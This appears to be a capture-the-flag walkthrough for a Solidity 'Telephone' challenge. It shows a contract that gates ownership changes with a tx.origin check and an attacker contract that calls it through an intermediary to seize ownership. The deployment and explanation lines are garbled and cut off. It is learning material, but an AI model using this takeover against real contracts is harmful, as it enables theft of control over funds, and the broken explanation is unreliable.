Step 1: Understand the Vulnerability
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Telephone {
address public owner;
constructor() {
owner = msg.sender;
}
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}
The vulnerability lies in the changeOwner function. It only checks if the transaction's origin (tx.origin) is not equal to the sender (msg.sender) to change the owner.
Step 2: Exploit the Vulnerability
pragma solidity ^0.8.0;
contract Hack {
constructor(address _target) {
Telephone(_target).changeOwner(msg.sender);
}
}
Step 3: Deploy and Verify the Exploit
_target parameter.SUCCESS
Explanation:
changeOwner function.changeOwner function of the "Telephone" contract and passing your wallet address as the new owner.changeOwner function in the "Telephone" contract, effectively changing the owner to your wallet address.